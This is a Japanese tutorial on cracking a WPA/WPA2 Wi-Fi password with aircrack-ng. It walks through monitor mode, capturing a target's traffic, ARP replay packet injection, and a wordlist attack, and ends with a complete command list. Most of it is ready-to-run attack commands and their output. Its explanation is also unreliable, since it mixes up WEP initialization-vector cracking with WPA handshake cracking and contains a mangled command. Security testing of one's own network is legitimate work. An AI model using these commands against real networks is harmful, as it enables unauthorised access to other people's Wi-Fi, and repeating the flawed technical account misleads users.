Aircrack-ng は基本的に、次の目的を達成するために作成されたネットワーク ソフトウェア スイートです。
このチュートリアルは包括的なガイドではなく、独自のネットワークのセキュリティをテストし、概念に慣れるための基本的なスキルを構築することを目的としていることに注意してください。
以下に概説する攻撃は受動的な手法 (ARP リクエスト リプレイ攻撃) に基づいており、既にインジェクション用のパッチが適用されたドライバーが動作するワイヤレス カードがあることを前提とした Debian ベースのディストリビューションに焦点を当てています。
Aircrack-ng は、ソース コードをコンパイルすることで、debian ベースのオペレーティング システムにインストールできます (詳細については、公式 Web サイトを参照してください)。
以下に、Debian ベースのオペレーティング システム用の aircrack-ng を構築するための基本要件をインストールする手順を示します。
$ sudo apt install build-essential autoconf automake libtool pkg-config libnl-3-dev libnl-genl-3-dev libssl-dev ethtool shtool rfkill zlib1g-dev libpcap-dev libsqlite3-dev libpcre3-dev libhwloc-dev libcmocka-dev hostapd wpasupplicant tcpdump screen iw usbutils
aircrack-ng の最新コピーを取得します。
$ git clone https://github.com/aircrack-ng/aircrack-ng
$ cd aircrack-ng
aircrack-ng をビルドするには、Autotools ビルド システムが使用されます。まず、適切なオプションを使用してビルドするプロジェクト./configure
。
$ autoreconf -i
$ ./configure --with-experimental
次に、 make
コマンドを使用してプロジェクトをコンパイルし、以下にリストされている追加ターゲットから「インストール」ターゲットを使用してインストールを完了します。
make check
make integration
make install
make uninstall
この手順の目的は、カードがインジェクションを正常にサポートしていることを確認することです。インターフェイス名が「wlan0」であると仮定して(端末でiwconfig
と入力すると取得できます)、次のコマンドを入力します。
# aireplay-ng --test wlan0
システムは次のように応答します。
18:10:59 wlan0 channel: 10
18:10:59 Trying broadcast probe requests...
18:10:59 Injection is working!
18:11:00 Found 1 AP
...
これにより、カードがパケットを挿入できることが確認されます。
最初に行うことは、 airmon-ng
使用してワイヤレス カードを監視モードにする潜在的なターゲットを探すことです。ただし、aircrack-ng スイートを使用する前に、干渉するプロセスをすべてkill
を強くお勧めします。
# airmon-ng check kill
Killing these processes:
PID Name
870 dhclient
1115 wpa_supplicant
次に、別のインターフェイス (mon0) の作成に使用されるモニター モードを有効にすることができます。
# airmon-ng start wlan0
PHY Interface Driver Chipset
phy0 wlan0 ath9k Qualcomm Atheros AR9485
(monitor mode enabled for [phy0]wlan0 on [phy0]mon0)
「wlan0」が正常に監視モードになっていることがわかります。次に、 airodump-ng
起動してネットワークを調べます。
# airodump-ng mon0
クラックするワイヤレス ネットワークを見つけて、次の出力からその BSSID とチャネルをメモします。
CH 10 ][ Elapsed: 36 s][2019-05-15 18:15
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
08:00:BF:E6:31:2E -21 100 5240 178307 338 10 54 WPA CCMP PSK infosec_router
...
出力の上部には範囲内の AP に関する情報がリストされ、下部には対応する AP に接続されているクライアントがリストされることに注意してください。
別のコンソール セッションを開いて、ターゲットによって生成された初期ベクトルをキャプチャし、結果をファイルに保存します。
# airodump-ng -c 10 --bssid 08:00:BF:E6:31:2E -w output-file mon0
ここで、 -c 10
はワイヤレス ネットワークのチャネル、 --bssid 08:00:BF:E6:31:2E
は AP の MAC アドレス、 -w output-file
初期化ベクトルを含む出力ファイルを定義します。 mon0
はインターフェイス名です。
システムは次のように応答します。
CH 10 ][ Elapsed: 12 s][2019-05-15 18:16
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
08:00:BF:E6:31:2E -21 100 5240 178307 338 10 54 WPA CCMP PSK infosec_router
BSSID STATION PWR Lost Packets Probes
08:00:BF:E6:31:2E 00:0F:35:51:AC:22 -21 0 183782
コマンドを実行すると、さまざまなファイルが生成されます。
古典的な ARP リクエスト リプレイ攻撃は、新しい初期化ベクトルを生成する最も効果的な方法であり、非常に確実に機能します。このステップの目的は、ARP リクエストをリッスンしてアクセス ポイントに再挿入するモードでaireplay-ng
開始することです。 airodump-ng
とaireplay-ng
実行したままにして、別の端末を開いて ARP リクエスト リプレイ攻撃を実行します。
# aireplay-ng --arpreplay -b 08:00:BF:E6:31:2E -h 00:0F:35:51:AC:22 mon0
Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 618643 packets (got 304896 ARP requests), sent 194947 packets...
airodump-ng
画面を見ると、パケットが挿入されたかどうかを確認できます。
この時点で、前の手順で収集した初期化ベクトルから WPA キーを取得できるはずです。この攻撃を実行するにはワードリストが必要ですが、ネットワークパスワードがワードファイルに含まれていない場合、パスワードを解読することはできません。ほとんどの WPA/WPA2 ルーターには、多くのユーザーが (当然のことながら) 変更しないままにしている強力な 12 文字のランダムなパスワードが付属していることに注意してください。これらのパスワードのいずれかを解読しようとしている場合は、WPA 長のパスワード リストを使用することをお勧めします。
別のコンソール セッションを開き、次のように入力します。
# aircrack-ng -a2 -b 08:00:BF:E6:31:2E -w wordlist.txt output * .cap
ここで、 -a2
WPA/WPA2-PSK の攻撃モードを指定し、 -w wordlist.txt
独自の辞書ワードリストを参照し、 output*.cap
.cap
拡張子を持つすべての出力ファイルを選択します。
これは、攻撃が成功した場合の出力です。
Aircrack-ng 1.5.2
[00:00:00] 192/1229 keys tested (520.04 k/s)
Time left: 0 seconds 15.62%
KEY FOUND! [ notsecure ]
Master Key : 42 28 5E 5A 73 33 90 E9 34 CC A6 C3 B1 CE 97 CA
06 10 96 05 CC 13 FC 53 B0 61 5C 19 45 9A CE 63
Transient Key : 86 D0 43 C9 AA 47 F8 03 2F 71 3F 53 D6 65 F3 F3
86 36 52 0F 48 1E 57 4A 10 F8 B6 A0 78 30 22 1E
4E 77 F0 5E 1F FC 73 69 CA 35 5B 54 4D B0 EC 1A
90 FE D0 B9 33 06 60 F9 33 4B CF 30 B4 A8 AE 3A
EAPOL HMAC : 8E 52 1B 51 E8 F2 7E ED 95 F4 CF D2 C6 D0 F0 68
以下に、WPA/WPA2 ネットワークをクラックするために必要なすべてのコマンドのリストを示します。
# kill all interfering processes prior to using the aircrack-ng
airmon-ng check kill
# put your network device into monitor mode
airmon-ng start wlan0
# listen for all nearby beacon frames to get target BSSID and channel
airodump-ng mon0
# start listening for the handshake on a new console session
airodump-ng -c 10 --bssid 08:00:BF:E6:31:2E -w output-file mon0
# start the ARP request replay attack
aireplay-ng --arpreplay -b 08:00:BF:E6:31:2E -h 00:0F:35:51:AC:22 mon0
# run aircrack-ng to obtain the WPA key
aircrack-ng -a2 -b 08:00:BF:E6:31:2E -w wordlist.txt output*.cap
このプロジェクトは MIT ライセンスに基づいてライセンスされています。詳細については、LICENSE ファイルを参照してください。
このチュートリアルは教育目的のみに作成されており、悪意のある行為を促進するものではなく、違法行為については責任を負いません。